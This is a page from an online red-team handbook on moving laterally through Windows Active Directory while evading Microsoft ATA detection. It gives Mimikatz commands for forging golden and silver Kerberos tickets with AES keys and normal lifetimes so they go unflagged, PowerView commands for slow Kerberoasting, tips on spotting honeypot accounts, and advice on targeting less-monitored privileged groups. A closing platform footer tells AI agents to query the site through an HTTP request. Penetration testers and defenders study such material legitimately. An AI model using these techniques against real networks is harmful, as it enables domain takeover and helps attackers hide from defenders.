> For the complete documentation index, see [llms.txt](https://kwcsec.gitbook.io/the-red-team-handbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/ata-atp/lateral-movement.md).

# Lateral Movement

Most lateral movement techniques like PSexec, PSRemoting, DCOM, and WMIexec are detected only if it's "abnormal traffic." If these technologies are used often by the user, like help desk commonly RDPing to workstations to help fix technical problems, then it will be safe to use that as it is considered "normal behavior."

But, there are other more stealthy ways to move laterally apart from using those technologies.

## Over-Pass-The-Hash

Using only NTLM hashes to OPTH will be flagged by ATA as an encryption downgrade or unusual protocol implementation.

To generate kerberos tickets that will not be flagged, supply NTLM and AES keys and set the lifetime of the ticket to a normal value

```
kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /aes128:<AES_KEY> /NTLM:<NTLM_HASH> /aes256:<AES_KEY> /endin:600 /renewmax:300 /ptt
```

Note that you can supply all zeroes for the aes128 key and it will not be flagged.

## SQL

Moving laterally through SQL databases is not detected due to the fact that no traffic goes to the DC. All SQL authentication events are local to the server. We can find passwords and hashes of a privileged user, impersonate that user, and go on from there.

{% embed url="<https://kwcsec.gitbook.io/the-red-team-handbook/infrastructure/sql/ms-sql>" %}

## Silver Tickets

Using Kerberoasting and Silver Tickets are a good way to move laterally as Kerberoasting blends in with regular traffic and silver tickets have no communication with the DC whatsoever since its a forged TGS.

Make sure to slowly kerberoast users as kerberoasting all at once will cause spikes of traffic which may cause alerts.

We can slowly enumerate user objects with an SPN, by OU:&#x20;

```csharp
 Get-DomainUser -SPN -SearchBase “ldap://OU=office,DC=...”
```

Then perform recon on groups that have access on various targets of interest:

```csharp
Get-DomainGroup -MemberIdentity <user>
```

And then kerberoast that target if applicable:&#x20;

```csharp
Get-DomainUser <user> | Get-DomainSPNTicket | fl *
```

Beware of Honeypot SPNs, factor in last logon, creation date etc. to identify these types of accounts

If we successfully crack the hash, we can then create a silver ticket

```
kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /rc4:<AES_KEY> /endin:600 /renewmax:300 /service:<SERVICE> /target:<TARGET_COMPUTER> /ptt
```

## Modification of Sensitive groups

If any of these sensitive groups are modified(like adding an account or changing passwords), These will be flagged for abnormal activity.

![](/files/-MgseOi_yaic_o0wpO9M)

As a result, we can target other privileged groups like SQL admins or Help desk users.

## Golden Tickets

The same logic applies to silver tickets to golden tickets as well, if we only supply the NTLM hash, it will be flagged as an encryption downgrade.

To subvert this, include all AES keys, note that if the length of the ticket is alive for more than 8 hours than its use, it is going to be flagged. So for extra stealthyness, create the ticket for like 20 minutes, use the ticket, and instantly destroy the ticket after:

```
kerberos::golden /user:JohnVanwagoner /domain:prod.local /sid:sid /aes256:aes256 /groups:512,513,519 /startoffset:-1 /endin:2500 /renewmax:3000 /ptt 
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/ata-atp/lateral-movement.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.